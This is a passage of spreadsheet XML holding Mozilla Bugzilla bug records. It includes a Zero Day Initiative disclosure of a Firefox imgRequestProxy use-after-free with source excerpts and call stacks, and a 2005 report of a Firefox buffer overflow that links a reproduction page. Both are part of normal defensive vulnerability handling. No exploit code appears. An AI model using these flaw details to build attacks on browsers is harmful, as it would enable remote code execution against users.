13 	libmozjs.dylib 	js_Invoke 	js/src/jsinterp.cpp:1331
14 	libmozjs.dylib 	js_InternalInvoke 	js/src/jsinterp.cpp:1388
15 	libmozjs.dylib 	JS_CallFunctionValue 	js/src/jsapi.cpp:5244
16 	XUL 	nsJSContext::CallEventHandler 	dom/src/base/nsJSEnvironment.cpp:1989
17 	XUL 	nsJSEventListener::HandleEvent 	dom/src/events/nsJSEventListener.cpp:247
18 	XUL 	nsEventListenerManager::HandleEventSubType 	content/events/src/nsEventListenerManager.cpp:1090
19 	XUL 	nsEventListenerManager::HandleEvent 	content/events/src/nsEventListenerManager.cpp:1195
20 	XUL 	nsEventTargetChainItem::HandleEvent 	content/events/src/nsEventDispatcher.cpp:236
21 	XUL 	nsEventTargetChainItem::HandleEventTargetChain 	content/events/src/nsEventDispatcher.cpp:300
22 	XUL 	nsEventDispatcher::Dispatch 	content/events/src/nsEventDispatcher.cpp:514
23 	XUL 	DocumentViewerImpl::LoadComplete 	layout/base/nsDocumentViewer.cpp:989
24 	XUL 	nsDocShell::EndPageLoad 	docshell/base/nsDocShell.cpp:5185
25 	XUL 	nsWebShell::EndPageLoad 	docshell/base/nsWebShell.cpp:1015
26 	XUL 	nsDocShell::OnStateChange 	docshell/base/nsDocShell.cpp:5081
27 	XUL 	nsDocLoader::FireOnStateChange 	uriloader/base/nsDocLoader.cpp:1235
28 	XUL 	nsDocLoader::doStopDocumentLoad 	uriloader/base/nsDocLoader.cpp:858
29 	XUL 	nsDocLoader::DocLoaderIsEmpty 	uriloader/base/nsDocLoader.cpp:763
30 	XUL 	nsDocLoader::OnStopRequest 	uriloader/base/nsDocLoader.cpp:679
31 	XUL 	nsLoadGroup::RemoveRequest 	netwerk/base/src/nsLoadGroup.cpp:688
32 	XUL 	nsDocument::DoUnblockOnload 	content/base/src/nsDocument.cpp:7016
33 	XUL 	nsDocument::DispatchContentLoadedEvents 	content/base/src/nsDocument.cpp:3945
34 	XUL 	nsRunnableMethod&lt;nsDocument&gt;::Run 	nsThreadUtils.h:264
35 	XUL 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:510
36 	XUL 	NS_ProcessPendingEvents_P 	nsThreadUtils.cpp:180
37 	XUL 	nsBaseAppShell::NativeEventCallback 	widget/src/xpwidgets/nsBaseAppShell.cpp:121
38 	XUL 	nsAppShell::ProcessGeckoEvents 	widget/src/cocoa/nsAppShell.mm:374
39 	CoreFoundation 	CoreFoundation@0x735f4 	
40 	CoreFoundation 	CoreFoundation@0x73cd7 	
41 	HIToolbox 	HIToolbox@0x302bf 	
42 	HIToolbox 	HIToolbox@0x30011 	
43 	HIToolbox 	HIToolbox@0x2ff4c 	
44 	AppKit 	AppKit@0x40d7c 	
45 	AppKit 	AppKit@0x4062f 	
46 	JavaEmbeddingPlugin 	-[MyNSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] 	Controller.m:205
47 	XUL 	nsAppShell::ProcessNextNativeEvent 	widget/src/cocoa/nsAppShell.mm:626
48 	XUL 	nsBaseAppShell::DoProcessNextNativeEvent 	widget/src/xpwidgets/nsBaseAppShell.cpp:151
49 	XUL 	nsBaseAppShell::OnProcessNextEvent 	widget/src/xpwidgets/nsBaseAppShell.cpp:278
50 	XUL 	nsAppShell::OnProcessNextEvent 	widget/src/cocoa/nsAppShell.mm:766
51 	XUL 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:497
52 	XUL 	NS_ProcessPendingEvents_P 	nsThreadUtils.cpp:180
53 	XUL 	nsBaseAppShell::NativeEventCallback 	widget/src/xpwidgets/nsBaseAppShell.cpp:121
54 	XUL 	nsAppShell::ProcessGeckoEvents 	widget/src/cocoa/nsAppShell.mm:374
55 	CoreFoundation 	CoreFoundation@0x735f4 	
56 	CoreFoundation 	CoreFoundation@0x73cd7 	
57 	HIToolbox 	HIToolbox@0x302bf 	
58 	HIToolbox 	HIToolbox@0x30011 	
59 	HIToolbox 	HIToolbox@0x2ff4c 	
60 	AppKit 	AppKit@0x40d7c 	
61 	AppKit 	AppKit@0x4062f 	
62 	JavaEmbeddingPlugin 	-[MyNSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] 	Controller.m:205
63 	AppKit 	AppKit@0x3966a 	
64 	XUL 	nsAppShell::Run 	widget/src/cocoa/nsAppShell.mm:693
65 	XUL 	nsAppStartup::Run 	toolkit/components/startup/src/nsAppStartup.cpp:192
66 	XUL 	XRE_main 	toolkit/xre/nsAppRunner.cpp:3269
67 	firefox-bin 	main 	browser/app/nsBrowserApp.cpp:156
68 	firefox-bin 	firefox-bin@0x1541 	
69 	firefox-bin 	firefox-bin@0x1468 	
70 		@0x2</t>
        </is>
      </c>
      <c r="X2087" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2088">
      <c r="A2088" t="n">
        <v>1531420</v>
      </c>
      <c r="B2088" t="inlineStr">
        <is>
          <t>2019-02-28 10:03:28 -0800</t>
        </is>
      </c>
      <c r="C2088" t="inlineStr">
        <is>
          <t>socorro deploy: 368</t>
        </is>
      </c>
      <c r="D2088" t="inlineStr">
        <is>
          <t>2019-02-28 10:36:08 -0800</t>
        </is>
      </c>
      <c r="E2088" t="n">
        <v>1</v>
      </c>
      <c r="F2088" t="n">
        <v>1</v>
      </c>
      <c r="G2088" t="n">
        <v>4</v>
      </c>
      <c r="H2088" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2088" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2088" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K2088" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2088" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2088" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2088" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2088" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2088" t="inlineStr"/>
      <c r="Q2088" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2088" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2088" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2088" t="n">
        <v>1</v>
      </c>
      <c r="U2088" t="n">
        <v>0</v>
      </c>
      <c r="V2088" t="n">
        <v>3</v>
      </c>
      <c r="W2088" t="inlineStr">
        <is>
          <t>We want to do a Socorro -prod deploy today tagged 368.
It consists of the following:
(current tag: 367 - `051c2e1`)
`ee14dbb`: Add MessageLoop::PostTask and MessageLoop::PostTask_Helper to skip list (#4831) (jrmuizel)
`9ec3689`: bug 1513346: import Queue from non-six place (#4836) (willkg)
(next tag: 368 - `9ec3689`)</t>
        </is>
      </c>
      <c r="X2088" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2089">
      <c r="A2089" t="n">
        <v>942164</v>
      </c>
      <c r="B2089" t="inlineStr">
        <is>
          <t>2013-11-22 07:40:47 -0800</t>
        </is>
      </c>
      <c r="C2089" t="inlineStr">
        <is>
          <t>imgRequestProxy Use-After-Free Remote Code Execution Vulnerability (ZDI-CAN-2036)</t>
        </is>
      </c>
      <c r="D2089" t="inlineStr">
        <is>
          <t>2015-02-25 20:46:46 -0800</t>
        </is>
      </c>
      <c r="E2089" t="n">
        <v>1</v>
      </c>
      <c r="F2089" t="n">
        <v>1</v>
      </c>
      <c r="G2089" t="n">
        <v>3</v>
      </c>
      <c r="H2089" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2089" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2089" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2089" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2089" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2089" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2089" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2089" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2089" t="inlineStr">
        <is>
          <t>[external-reporter][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q2089" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2089" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2089" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2089" t="n">
        <v>1</v>
      </c>
      <c r="U2089" t="n">
        <v>0</v>
      </c>
      <c r="V2089" t="n">
        <v>42</v>
      </c>
      <c r="W2089" t="inlineStr">
        <is>
          <t>Date: Thu, 21 Nov 2013 14:21:29 -0600
From: ZDI Disclosures &lt;zdi-disclosures@tippingpoint.com&gt;
To: security@mozilla.org
Subject: ZDI-CAN-2036: New Vulnerability Report
-----//-----
ZDI-CAN-2036: Mozilla Firefox imgRequestProxy Use-After-Free Remote Code Execution Vulnerability
-- CVSS -----------------------------------------
6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
HP's Zero Day Initiative has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Flaw exists in image processing when source is set by server with content-type
"multipart/x-mixed-replace". When new image is getting loaded, new
imgRequestProxy object gets allocated by imgLoader::CreateNewProxyForRequest():
C:\mozilla-build\mozilla-central\image\src\imgLoader.cpp:644
------------------------------------------------------------
nsresult imgLoader::CreateNewProxyForRequest(imgRequest *aRequest, nsILoadGroup *aLoadGroup,
                                             imgINotificationObserver *aObserver,
                                             nsLoadFlags aLoadFlags, imgRequestProxy **_retval)
{
  LOG_SCOPE_WITH_PARAM(GetImgLog(), "imgLoader::CreateNewProxyForRequest", "imgRequest", aRequest);
  /* XXX If we move decoding onto separate threads, we should save off the
     calling thread here and pass it off to |proxyRequest| so that it call
     proxy calls to |aObserver|.
   */
  imgRequestProxy *proxyRequest = new imgRequestProxy();
  NS_ADDREF(proxyRequest);
...
Related call stack:
ChildEBP RetAddr
001def64 5a89a3ae xul!imgLoader::CreateNewProxyForRequest+0x98 [c:\mozilla-build\mozilla-central\image\src\imgloader.cpp @ 644]
001df188 5ab3dda8 xul!imgLoader::LoadImage+0xb6c [c:\mozilla-build\mozilla-central\image\src\imgloader.cpp @ 1771]
001df1f0 5ab6d966 xul!nsContentUtils::LoadImage+0x1f8 [c:\mozilla-build\mozilla-central\content\base\src\nscontentutils.cpp @ 2768]
001df22c 5afea673 xul!nsDocument::MaybePreLoadImage+0xce [c:\mozilla-build\mozilla-central\content\base\src\nsdocument.cpp @ 8518]
001df244 5afd5689 xul!nsHtml5TreeOpExecutor::PreloadImage+0x3a [c:\mozilla-build\mozilla-central\parser\html\nshtml5treeopexecutor.cpp @ 1076]
001df2b4 5afeb6e2 xul!nsHtml5SpeculativeLoad::Perform+0x10b [c:\mozilla-build\mozilla-central\parser\html\nshtml5speculativeload.cpp @ 32]
001df2ec 5afd6efc xul!nsHtml5TreeOpExecutor::RunFlushLoop+0xef [c:\mozilla-build\mozilla-central\parser\html\nshtml5treeopexecutor.cpp @ 508]
001df2f8 5b9b69a3 xul!nsHtml5ExecutorFlusher::Run+0x2d [c:\mozilla-build\mozilla-central\parser\html\nshtml5streamparser.cpp @ 133]
001df35c 5b96f8cc xul!nsThread::ProcessNextEvent+0x298 [c:\mozilla-build\mozilla-central\xpcom\threads\nsthread.cpp @ 622]
001df370 5b4eb8d5 xul!NS_ProcessNextEvent+0x3d [c:\mozilla-build\mozilla-central\xpcom\glue\nsthreadutils.cpp @ 238]
001df39c 5b9f3baa xul!mozilla::ipc::MessagePump::Run+0xc9 [c:\mozilla-build\mozilla-central\ipc\glue\messagepump.cpp @ 85]
001df3bc 5b9f40e7 xul!MessageLoop::RunInternal+0x3c [c:\mozilla-build\mozilla-central\ipc\chromium\src\base\message_loop.cc @ 220]
001df3f0 5b9f45b2 xul!MessageLoop::RunHandler+0x4d [c:\mozilla-build\mozilla-central\ipc\chromium\src\base\message_loop.cc @ 214]
001df410 5b44bdc1 xul!MessageLoop::Run+0x19 [c:\mozilla-build\mozilla-central\ipc\chromium\src\base\message_loop.cc @ 188]
001df420 5b410231 xul!nsBaseAppShell::Run+0x47 [c:\mozilla-build\mozilla-central\widget\xpwidgets\nsbaseappshell.cpp @ 163]
001df430 5b255735 xul!nsAppShell::Run+0x11 [c:\mozilla-build\mozilla-central\widget\windows\nsappshell.cpp @ 113]
In frame Nr.4 one can see nsDocument::MaybePreLoadImage() call:
C:\mozilla-build\mozilla-central\content\base\src\nsDocument.cpp:8477
---------------------------------------------------------------------
void
nsDocument::MaybePreLoadImage(nsIURI* uri, const nsAString &amp;amp;aCrossOriginAttr)
{
  // Early exit if the img is already present in the img-cache
  // which indicates that the "real" load has already started and
  // that we shouldn't preload it.
  int16_t blockingStatus;
  if (nsContentUtils::IsImageInCache(uri, static_cast&lt;nsIDocument *&gt;(this)) ||
      !nsContentUtils::CanLoadImage(uri, static_cast&lt;nsIDocument *&gt;(this),
                                    this, NodePrincipal(), &amp;amp;blockingStatus)) {
    return;
  }
  nsLoadFlags loadFlags = nsIRequest::LOAD_NORMAL;
  switch (Element::StringToCORSMode(aCrossOriginAttr)) {
  case CORS_NONE:
    // Nothing to do
    break;
  case CORS_ANONYMOUS:
    loadFlags |= imgILoader::LOAD_CORS_ANONYMOUS;
    break;
  case CORS_USE_CREDENTIALS:
    loadFlags |= imgILoader::LOAD_CORS_USE_CREDENTIALS;
    break;
  default:
    MOZ_CRASH("Unknown CORS mode!");
  }
  // Image not in cache - trigger preload
  nsRefPtr&lt;imgRequestProxy&gt; request;
  nsresult rv =
    nsContentUtils::LoadImage(uri,
                              this,
                              NodePrincipal(),
                              mDocumentURI, // uri of document used as referrer
                              nullptr,       // no observer
                              loadFlags,
                              getter_AddRefs(request));
  // Pin image-reference to avoid evicting it from the img-cache before
  // the "real" load occurs. Unpinned in DispatchContentLoadedEvents and
  // unlink
  if (NS_SUCCEEDED(rv)) {
    mPreloadingImages.AppendObject(request);
  }
}
...
This will save reference to imgRequestProxy object in mPreloadingImages. After
image has loaded nsDocument::DispatchContentLoadedEvents() will be called:
C:\mozilla-build\mozilla-central\content\base\src\nsDocument.cpp:4611
---------------------------------------------------------------------
void
nsDocument::DispatchContentLoadedEvents()
{
  // If you add early returns from this method, make sure you're
  // calling UnblockOnload properly.
  // Unpin references to preloaded images
  mPreloadingImages.Clear();
...
This will call imgRequestProxy::Release() and imgRequestProxy object will be
freed:
C:\mozilla-build\mozilla-central\image\src\imgRequestProxy.cpp:94
-----------------------------------------------------------------
NS_IMPL_RELEASE(imgRequestProxy)
...
Related call stack:
ChildEBP RetAddr
001df25c 5a89e77e xul!imgRequestProxy::`scalar deleting destructor'+0x18
001df274 5a69795d xul!imgRequestProxy::Release+0x92 [c:\mozilla-build\mozilla-central\image\src\imgrequestproxy.cpp @ 94]
001df280 5a8929ab xul!nsCOMPtr&lt;nsIRequest&gt;::~nsCOMPtr&lt;nsIRequest&gt;+0x1e [c:\mozilla-build\mozilla-central\obj-i686-pc-mingw32\dist\include\nscomptr.h @ 514]
001df288 5a893774 xul!nsProgressNotificationProxy::~nsProgressNotificationProxy+0x1f [c:\mozilla-build\mozilla-central\image\src\imgloader.h @ 433]
001df29c 5b968f23 xul!nsProgressNotificationProxy::Release+0x95 [c:\mozilla-build\mozilla-central\image\src\imgloader.cpp @ 230]
001df2b0 5b9c6b00 xul!NS_ProxyRelease+0x43 [c:\mozilla-build\mozilla-central\xpcom\glue\nsproxyrelease.cpp @ 48]
001df2d8 5b9c6c49 xul!nsInterfaceRequestorAgg::~nsInterfaceRequestorAgg+0x35 [c:\mozilla-build\mozilla-central\xpcom\base\nsinterfacerequestoragg.cpp @ 55]
001df2ec 5b968eb2 xul!nsInterfaceRequestorAgg::Release+0x6b [c:\mozilla-build\mozilla-central\xpcom\base\nsinterfacerequestoragg.cpp @ 37]
001df2f8 5b9b69a3 xul!nsProxyReleaseEvent::Run+0xf [c:\mozilla-build\mozilla-central\xpcom\glue\nsproxyrelease.cpp @ 20]
001df35c 5b96f8cc xul!nsThread::ProcessNextEvent+0x298 [c:\mozilla-build\mozilla-central\xpcom\threads\nsthread.cpp @ 622]
001df370 5b4eb8d5 xul!NS_ProcessNextEvent+0x3d [c:\mozilla-build\mozilla-central\xpcom\glue\nsthreadutils.cpp @ 238]
001df39c 5b9f3baa xul!mozilla::ipc::MessagePump::Run+0xc9 [c:\mozilla-build\mozilla-central\ipc\glue\messagepump.cpp @ 85]
001df3bc 5b9f40e7 xul!MessageLoop::RunInternal+0x3c [c:\mozilla-build\mozilla-central\ipc\chromium\src\base\message_loop.cc @ 220]
001df3f0 5b9f45b2 xul!MessageLoop::RunHandler+0x4d [c:\mozilla-build\mozilla-central\ipc\chromium\src\base\message_loop.cc @ 214]
001df410 5b44bdc1 xul!MessageLoop::Run+0x19 [c:\mozilla-build\mozilla-central\ipc\chromium\src\base\message_loop.cc @ 188]
001df420 5b410231 xul!nsBaseAppShell::Run+0x47 [c:\mozilla-build\mozilla-central\widget\xpwidgets\nsbaseappshell.cpp @ 163]
Though after imgRequestProxy is freed, another imgStatusTracker::SyncNotifyState()
call will use already freed imgRequestProxy object.
Triggering the bug is a bit hard, as it requires refreshing a lot of times.
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   Arthur Gerkis
-- FURTHER DETAILS ------------------------------
If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.
Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 180 days of the reported date. If you are ready to release a patch at any point leading up the the deadline please coordinate with us so that we may release our advisory detailing the issue. If the 180 day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:
Zero Day Initiative
zdi-disclosures@tippingpoint.com
The PGP key used for all ZDI vendor communications is available from:
     http://www.zerodayinitiative.com/documents/zdi-pgp-key.asc
-- INFORMATION ABOUT THE ZDI ---------------------
Established by TippingPoint and acquired by Hewlett-Packard, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.
The ZDI is unique in how the acquired vulnerability information is used. The ZDI does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its HP TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.
Please contact us for further information or refer to:
    http://www.zerodayinitiative.com
-- DISCLOSURE POLICY ----------------------------
Our vulnerability disclosure policy is available online at:
    http://www.zerodayinitiative.com/advisories/disclosure_policy/
gpgkeys: key 556D80C193A35B1C not found on keyserver
&lt;ZDI-CAN-2036.zip.pgp&gt;</t>
        </is>
      </c>
      <c r="X2089" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2090">
      <c r="A2090" t="n">
        <v>307259</v>
      </c>
      <c r="B2090" t="inlineStr">
        <is>
          <t>2005-09-06 13:41:34 -0700</t>
        </is>
      </c>
      <c r="C2090" t="inlineStr">
        <is>
          <t>Firefox 1.0.6 buffer overflow with hostname of all soft hyphens [@ nsStringBuffer::Realloc] [@ nsCSubstring::Capacity] [@ nsGenericElement::~nsGenericElement]</t>
        </is>
      </c>
      <c r="D2090" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:43 -0700</t>
        </is>
      </c>
      <c r="E2090" t="n">
        <v>1</v>
      </c>
      <c r="F2090" t="n">
        <v>1</v>
      </c>
      <c r="G2090" t="n">
        <v>3</v>
      </c>
      <c r="H2090" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2090" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2090" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2090" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2090" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2090" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2090" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2090" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2090" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q2090" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2090" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2090" t="inlineStr">
        <is>
          <t>mozilla1.8beta5</t>
        </is>
      </c>
      <c r="T2090" t="n">
        <v>1</v>
      </c>
      <c r="U2090" t="n">
        <v>0</v>
      </c>
      <c r="V2090" t="n">
        <v>92</v>
      </c>
      <c r="W2090" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050416 Epiphany/1.2.8
Build Identifier: 
I have found a format string vulnerability within Firefox 1.0.6 which allows for
arbitrary code execution.
Affect Versions:
Firefox Linux 1.0.6
Firefox Win32 1.0.6
Deer Park Latest Build
Below is a url to reproduce this issue:
http://www.security-protocols.com/firefoxwin32-death.html
If you need any further information, please let me know.
Thanks,
Tom Ferris
Researcher
www.security-protocols.com
Key fingerprint = 0DFA 6275 BA05 0380 DD91  34AD C909 A338 D1AF 5D78
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X2090" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2091">
      <c r="A2091" t="n">
        <v>530984</v>
      </c>
      <c r="B2091" t="inlineStr">
        <is>
          <t>2009-11-24 20:11:54 -0800</t>
        </is>
      </c>
      <c r="C2091" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Thunderbird 3.0rc1 to bouncer</t>
        </is>
      </c>
      <c r="D2091" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2091" t="n">
        <v>1</v>
      </c>
      <c r="F2091" t="n">
        <v>1</v>
      </c>
      <c r="G2091" t="n">
        <v>5</v>
      </c>
      <c r="H2091" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2091" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2091" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2091" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2091" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2091" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N2091" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2091" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2091" t="inlineStr"/>
      <c r="Q2091" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2091" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2091" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2091" t="n">
        <v>1</v>
      </c>
      <c r="U2091" t="n">
        <v>0</v>
      </c>
      <c r="V2091" t="n">
        <v>2</v>
      </c>
      <c r="W2091" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #519175 +++
solaris-sparc:
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0rc1.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0rc1.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0rc1.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0rc1.en-US.opensolaris-i386.tar.bz2
The partial MAR for (3.0b4 to 3.0rc1):
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0b4-3.0rc1.en-US.solaris-10-fcs-sparc.partial.mar
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0b4-3.0rc1.en-US.solaris-10-fcs-i386.partial.mar
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0b4-3.0rc1.en-US.opensolaris-sparc.partial.mar
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0b4-3.0rc1.en-US.opensolaris-i386.partial.mar
The complete MAR for 3.0rc1:
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0rc1.en-US.solaris-10-fcs-sparc.complete.mar
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0rc1.en-US.solaris-10-fcs-i386.complete.mar
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0rc1.en-US.opensolaris-sparc.complete.mar
/thunderbird/releases/3.0rc1/contrib/solaris_tarball/thunderbird-3.0rc1.en-US.opensolaris-i386.complete.mar
Thanks!</t>
        </is>
      </c>
      <c r="X2091" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2092">
      <c r="A2092" t="n">
        <v>45676</v>
      </c>
      <c r="B2092" t="inlineStr">
        <is>
          <t>2000-07-17 13:07:24 -0700</t>
        </is>
      </c>
      <c r="C2092" t="inlineStr">
        <is>
          <t>leak global object after hovering over image in scrollbar</t>
        </is>
      </c>
      <c r="D2092" t="inlineStr">
        <is>
          <t>2000-11-02 11:56:26 -0800</t>
        </is>
      </c>
      <c r="E2092" t="n">
        <v>1</v>
      </c>
      <c r="F2092" t="n">
        <v>1</v>
      </c>
      <c r="G2092" t="n">
        <v>3</v>
      </c>
      <c r="H2092" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2092" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2092" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2092" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2092" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2092" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2092" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2092" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2092" t="inlineStr">
        <is>
          <t>[nsbeta3+]</t>
        </is>
      </c>
      <c r="Q2092" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2092" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2092" t="inlineStr">
        <is>
          <t>M18</t>
        </is>
      </c>
      <c r="T2092" t="n">
        <v>1</v>
      </c>
      <c r="U2092" t="n">
        <v>0</v>
      </c>
      <c r="V2092" t="n">
        <v>42</v>
      </c>
      <c r="W2092" t="inlineStr">
        <is>
          <t>DESCRIPTION:  We leak two GlobalWindowImpl if we send an event to one of the
images in a GFX scrollbar.
STEPS TO REPRODUCE:
 * setenv XPCOM_MEM_LEAK_LOG 1
 * load a page (from the command line, if you don't want typing leaks!) that's
long enough to have a scrollbar
 * hover the mouse pointer for a short time over one of the images in the GFX
scrollbar (either the arrow image or the one in the middle of the slider)
 * click the X in the window manager to close
ACTUAL RESULTS:
 * leak about 1 meg, including 2 GlobalWindowImpl
DOES NOT WORK CORRECTLY ON:
 * Linux, mozilla, my heavily modified (leak fixes, I hope) build of the morning
of 2000-07-17 tree closure
I'll try to investigate this later today using js_LiveThingToFind.
The initial component (XBL) is a total guess - since I believe this stuff is
constructed by XBL.  The problem could be anywhere.</t>
        </is>
      </c>
      <c r="X2092" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2093">
      <c r="A2093" t="n">
        <v>657267</v>
      </c>
      <c r="B2093" t="inlineStr">
        <is>
          <t>2011-05-15 19:16:21 -0700</t>
        </is>
      </c>
      <c r="C2093" t="inlineStr">
        <is>
          <t>possible for unsignend script to call functions inside signed scripts (jar)</t>
        </is>
      </c>
      <c r="D2093" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:43 -0700</t>
        </is>
      </c>
      <c r="E2093" t="n">
        <v>1</v>
      </c>
      <c r="F2093" t="n">
        <v>1</v>
      </c>
      <c r="G2093" t="n">
        <v>2</v>
      </c>
      <c r="H2093" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2093" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2093" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2093" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2093" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2093" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2093" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2093" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2093" t="inlineStr">
        <is>
